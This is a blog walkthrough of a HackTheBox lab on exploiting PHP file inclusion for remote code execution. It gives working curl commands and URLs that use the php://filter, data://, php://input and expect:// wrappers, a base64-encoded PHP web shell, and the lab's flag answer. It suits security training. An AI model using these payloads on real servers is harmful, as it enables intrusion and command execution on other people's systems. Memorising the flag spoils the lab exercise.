avatarHuy Phu

Summary

The website content describes methods for achieving Remote Code Execution (RCE) on a web application using PHP file inclusion vulnerabilities, specifically through data, input, and expect PHP wrappers, and provides examples of how to exploit these vulnerabilities when allow_url_include is enabled in the server's PHP configuration.

Abstract

The article titled "HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution" outlines the process of exploiting file inclusion vulnerabilities in PHP applications to achieve RCE. It details the necessity of having allow_url_include enabled in the PHP configuration files located at /etc/php/X.Y/apache2/php.ini for Apache servers or /etc/php/X.Y/fpm/php.ini for Nginx servers. The article explains the use of php://filter to read configuration files, the data:// wrapper for including PHP code via URL, and the php://input wrapper for POST requests. It also discusses the expect PHP extension, which allows direct command execution via URL streams. The author provides step-by-step commands using curl to demonstrate the exploitation of these wrappers to execute arbitrary commands on the server, ultimately leading to the retrieval of a flag file as proof of RCE.

Opinions

  • The author implies that exploiting file inclusion vulnerabilities is a common and effective technique for achieving RCE.
  • The article suggests that checking for allow_url_include and expect extension is a standard procedure in identifying potential vulnerabilities in PHP applications.
  • The author emphasizes the importance of understanding PHP wrappers to effectively perform Local File Inclusion (LFI) attacks that can lead to RCE.
  • The inclusion of real-world commands and examples indicates the practical application of the techniques discussed, implying that these are proven methods used by security professionals.
  • By encouraging readers to follow for more content and to clap for the post, the author seeks to establish a community of engaged readers interested in cybersecurity topics.

HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution

Data

  • Data wrappers can be used to include external data, including PHP code.
  • The application must have allow_url_include enabled, in the config file, which is located in /etc/php/X.Y/apache2/php.ini (Apache) or /etc/php/X.Y/fpm/php.ini (Nginx) where X.Y is the PHP version.
  • Use php://filter to check the config file
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
  • Once we find allow_url_include enabled, we can proceed to include external PHP code in the application '<?php system($_GET["cmd"]); ?>'(Note we need to encode the code first)
echo '<?php system($_GET["cmd"]); ?>' | base64
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

base64 & text/plain: allows the application to intake encoded strings and decode them.

Input

  • Input wrapper is similar to Data wrapper, which allows external resources. The only difference is that we must use input wrapper must be used with POST request
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
  • Input wrapper is usually used when an application does not accept GET request. If that’s the case, we need to modify the above command as system($_GET[“cmd”]) does not work. Instead, we use <\?php system('id')?>)

Expect

  • Expect allows users to run command directly via URL stream (without creating the web shell like the other 2 wrappers).
  • Expect must be installed and enabled in the application. We can check this by doing the same thing as we do to identify Data wrapper, except that now we grep | expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
extension=expect
  • Using expect to execute commands on the application: curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

Answer the question

Try to gain RCE using one of the PHP wrappers and read the flag at /

  • First, we check if Data & Expect wrappers are enabled on the application
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
  • We see that both expect extension and allow_url_include are enabled.
  • Use either one to get the flag. I’ll use the data filter.
# Running "ls /" command
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20/

# Display content of the flag
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/37809e2f8952f06139011994726d9ef1.txt

Answer: HTB{d!$46l3_r3m0t3_url_!nclud3}

Conclusion

  • These are the most common PHP wrappers that will be used to perform Local File Inclusion attacks and some Remote Code Execution.
  • Please clap if you like this post. And don’t forget to follow me for more Cybersecurity content.
Hackthebox
Php Wrappers
Local File Inclusion
Lfi
Remote Code Execution
Recommended from ReadMedium